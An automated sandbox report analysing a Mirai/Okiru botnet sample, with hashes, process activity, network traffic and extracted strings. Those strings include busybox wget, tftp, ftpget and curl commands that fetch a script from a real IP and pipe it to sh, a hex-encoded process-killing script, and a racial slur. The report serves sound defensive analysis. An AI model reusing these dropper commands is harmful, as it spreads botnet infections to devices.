Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
m68k.nn.elf

Overview

General Information

Sample name:m68k.nn.elf
Analysis ID:1568895
MD5:4ec8fc9e24ee7cb0b0334a961cce6e47
SHA1:d3f26710fa2c52ea680c36ab89cab49e1ce00d3f
SHA256:69b01a52a12676f94ce3665bdfec5416f729f7d27a0670779e2922c5ed38e884
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:68
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Sample deletes itself
Detected TCP or UDP traffic on non-standard ports
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1568895
Start date and time:2024-12-05 06:42:04 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:m68k.nn.elf
Detection:MAL
Classification:mal68.troj.evad.linELF@0/3@0/0
Command:/tmp/m68k.nn.elf
PID:6215
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • m68k.nn.elf (PID: 6215, Parent: 6131, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/m68k.nn.elf
  • udisksd New Fork (PID: 6226, Parent: 799)
  • dumpe2fs (PID: 6226, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6260, Parent: 799)
  • dumpe2fs (PID: 6260, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • sh (PID: 6262, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 6262, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • udisksd New Fork (PID: 6291, Parent: 799)
  • dumpe2fs (PID: 6291, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6325, Parent: 799)
  • dumpe2fs (PID: 6325, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
m68k.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    m68k.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6215.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        6215.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6230.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
            6230.1.00007fd1cc001000.00007fd1cc01c000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              Process Memory Space: m68k.nn.elf PID: 6215JoeSecurity_OkiruYara detected OkiruJoe Security
                Click to see the 1 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: m68k.nn.elfReversingLabs: Detection: 34%
                Source: m68k.nn.elfString: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/login94.156.227.234malloc[start_pid_hopping] Failed to clone: %s
                Source: m68k.nn.elfString: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
                Source: global trafficTCP traffic: 192.168.2.23:38960 -> 154.216.19.139:199
                Source: /tmp/m68k.nn.elf (PID: 6215)Socket: 0.0.0.0:38242Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: m68k.nn.elfString found in binary or memory: http://94.156.227.233/
                Source: m68k.nn.elfString found in binary or memory: http://94.156.227.233/curl.sh
                Source: m68k.nn.elfString found in binary or memory: http://94.156.227.233/lol.sh
                Source: m68k.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/shFound And Killed Process: PID=%d, Realpath=%s487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/
                Source: Initial sampleString containing 'busybox' found: usage: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
                Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh94.156.227.233GET /dlr. HTTP/1.0
                Source: Initial sampleString containing 'busybox' found: .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/m68k.nn.elf (PID: 6230)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6230)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6230)SIGKILL sent: pid: 1664, result: successfulJump to behavior
                Source: classification engineClassification label: mal68.troj.evad.linELF@0/3@0/0

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: /tmp/m68k.nn.elf (PID: 6215)File: /tmp/m68k.nn.elfJump to behavior
                Source: /tmp/m68k.nn.elf (PID: 6215)Queries kernel information via 'uname': Jump to behavior
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/usr/bin/qemu-sh4eb)
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-microblazeel
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-mipselQ0
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc32plus
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-riscv32
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips64el
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/oakdecode!/usr/bin/signcode1/usr/bin/POST/m68k/s10!/usr/bin/GET0!/usr/bin/systemd-path1/usr/bin/gkbd-keyboard-display0!/usr/bin/openvt0!/usr/bin/sg_luns1/usr/bin/whoami/m68k/s10!/usr/bin/col901/usr/bin/xfce4-display-settings1/usr/bin/deb-systemd-helper0!/usr/bin/vcs-run!/usr/bin/hp-testpage1/usr/bin/resgen2m68k/s10!/usr/bin/ld.bfd0!/usr/bin/grub-mkfont1/usr/bin/gpgv/m68k/s10!/usr/bin/whiptail!/usr/bin/byobu-ulevel1/usr/bin/qemu-sparc64s10!/usr/bin/sg_ident!/usr/bin/flock1/usr/bin/dfu-tool68k/s10!/usr/bin/thunar-volman!/usr/bin/startxfce41/usr/bin/update-manager10!/usr/bin/tree0!/usr/bin/Xephyr1/usr/bin/vmware-checkvm10!/usr/bin/xfrun40!/usr/bin/gpic1/usr/bin/pollinate8k/10!/usr/bin/c_rehash!/usr/bin/cp1/usr/bin/gnome-keyring-daemon
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/busctl0!/usr/bin/skill1/usr/bin/qemu-ppc64abi32
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U!/usr/bin/qemu-aarch64us1/usr/bin/xdg-user-dirs-gtk-update
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/expand0!/usr/bin/faillog1/usr/bin/locate/m68k/s10!/usr/bin/curl0!/usr/bin/journalctl1/usr/bin/screen/m68k/s10!/usr/bin/captoinfo!/usr/bin/xbuild1/usr/bin/pmap/m68k/s10!/usr/bin/vmware-rpctool!/usr/bin/sg_verify1/usr/bin/landscape-sysinfo0!/usr/bin/dbus-send!/usr/bin/pdfimages1/usr/bin/edit/m68k/s10!/usr/bin/pdfseparate!/usr/bin/sensors1/usr/bin/perlivpm68k/s10!/usr/bin/bwrap0!/usr/bin/rnano1/usr/bin/editor/m68k/s10!/usr/bin/kbxutil!/usr/bin/btrfsck1/usr/bin/dpkg-statoverride0!/usr/bin/ls0!/usr/bin/firefox1/usr/bin/xzegrepm68k/s10!/usr/bin/ico0!/usr/bin/yelp1/usr/bin/xconsole68k/s10!/usr/bin/usbhid-dump1/usr/bin/isdv4-serial-debugger1/usr/bin/catfishm68k/10!/usr/bin/bzegrep1/usr/bin/xfce4-power-manager-settings1/usr/bin/exo-desktop-item-edit
                Source: m68k.nn.elf, 6215.1.00007ffe9271a000.00007ffe9273b000.rw-.sdmp, m68k.nn.elf, 6230.1.00007ffe9271a000.00007ffe9273b000.rw-.sdmpBinary or memory string: /qemu-open.XXXXX
                Source: m68k.nn.elf, 6230.1.00007fd1cc01f000.00007fd1cc024000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-alpha
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-s390x
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4eb
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U1/usr/bin/x86_64-linux-gnu-c++filt!/usr/bin/qemu-xtensaeb!/usr/bin/linux32c
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmware-hgfsclient
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/m10!/run/log0!/proc/6163/exe1/tmp/vmware-root_721-4290559889exe!/tmp/.Test-unix !/proc/6169/exe1/var/run/dmeventd-serverc/6169/exe!/tmp/dmesgtail.log!/proc/6191/exe1/usr/bin/session-migration
                Source: m68k.nn.elf, 6215.1.00007ffe9271a000.00007ffe9273b000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-aarch64
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/ubuntu-drivers!/usr/bin/qemu-mips641/usr/bin/dvipdf/m68k/usr/bin/X0!/usr/bin/ikdasm0!/usr/bin/enchant-21/usr/bin/nroff/m68k/s10!/usr/bin/tzselect!/usr/bin/env1/usr/bin/X
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/usr/bin/qemu-mipsn32elP /usr/bin/amixerQ
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/mandb0!/usr/bin/qemu-riscv641/usr/bin/xvidtune68k/s10!/usr/bin/egrep0!/usr/bin/diff31/usr/bin/isodumpm68k/s10!/usr/bin/setkeycodes!/usr/bin/ssh-copy-id1/usr/bin/scpU/m68k/s10!/usr/bin/pod2usage!/usr/bin/ntfsrecover1/usr/bin/al2U/m68k/s10!/usr/bin/dirmngr-client!/usr/bin/ntfssecaudit1/usr/bin/json_ppm68k/s10!/usr/bin/fwupdate!/usr/bin/sdiff1/usr/bin/cd-fix-profile10!/usr/bin/Xorg0!/usr/bin/sftp1/usr/bin/purple-send/s10!/usr/bin/rdoc0!/usr/bin/resolvectl!/usr/bin/iecset/m68k/us!/usr/bin/routef/m68k/us1/usr/bin/fincorem68k/A01/usr/bin/apt-add-repository@!/usr/bin/bzfgrep1/usr/bin/xkill/m68k/s10!/usr/bin/jsonpatch!/usr/bin/mlocate!/usr/bin/awkU/m68k/us!/usr/bin/evince/m68k/us!/usr/bin/gipddecodek/A
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-nios2
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/racc2y2.7!/usr/bin/preunzip1/usr/bin/bunzip2m68k/s10!/usr/bin/slxdecode!/usr/bin/setterm1/usr/bin/xfce4-session-logout0!/usr/bin/debconf-escape!/usr/bin/bzcat!/usr/bin/xdg-open68k/us1/usr/bin/hwe-support-status0!/usr/bin/qemu-ppc641/usr/bin/updatedb.mlocate`!/usr/bin/macpack1/usr/bin/pod2text68k/s10!/usr/bin/gdb-add-index!/usr/bin/zcat1/usr/bin/hp-levels8k/s10!/usr/bin/qemu-armeb!/usr/bin/hp-info1/usr/bin/xfce4-settings-editor0!/usr/bin/podselect!/usr/bin/xgamma1/usr/bin/x86_64-linux-gnu-elfedit
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-mipsn32
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /m68k/usr/bin/qemu-mipsel
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-microblaze
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/pyhtmlizer3!/usr/bin/ptargrep!/usr/bin/qemu-x86_64/us1/usr/bin/linux-boot-prober0!/usr/bin/alsamixer1/usr/bin/gnome-screensaver`!/usr/bin/aspell1/usr/bin/xdg-screensaver
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/qemu-hppa!/usr/bin/splitfont1/usr/bin/vmware-vmblock-fuse0!/usr/bin/xmodmap!/usr/bin/umount1/usr/bin/resizepartk/s10!/usr/bin/pdftocairo!/usr/bin/setlogcons1/usr/bin/grub-mklayouts10!/usr/bin/locale-check!/usr/bin/dh_python21/usr/bin/users-admin/r/bin/[0!/usr/bin/sg_bg_ctl1/usr/bin/x86_64-linux-gnu-cpp1/usr/bin/avahi-browse-domains
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-cris
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/usr/bin/qemu-mipsn32
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsn32
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64le
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmware-toolbox-cmd
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-hppa
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: !/usr/bin/trial30!/usr/bin/xcmsdb1/usr/bin/isdv4-serial-inputattach!/usr/bin/strace0!/usr/bin/hp-probe1/usr/bin/cccheckm68k/s10!/usr/bin/fc-pattern!/usr/bin/apt-get1/usr/bin/pinentry-gtk-210!/usr/bin/fprintd-delete!/usr/bin/gucharmap1/usr/bin/qemu-sparc32plus
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/usr/bin/qemu-mipsel
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: 1/usr/libexec/ibus-engine-simple1/usr/lib/x86_64-linux-gnu/xfce4/notifyd1/usr/bin/x-window-manager0!/run/vmware0!/proc/2180/exe@1/usr/libexec/gsd-keyboard
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /var/run/vmware
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U1/usr/bin/catU/m68k/10!/usr/bin/qemu-mips64el!/usr/bin/btrfs-convert1/usr/bin/byobu-select-profile
                Source: m68k.nn.elf, 6215.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmp, m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: U/m68k/usr/bin/qemu-nios2
                Source: m68k.nn.elf, 6230.1.000055b3a5efb000.000055b3a5fa4000.rw-.sdmpBinary or memory string: /usr/bin/vmware-xferlogs
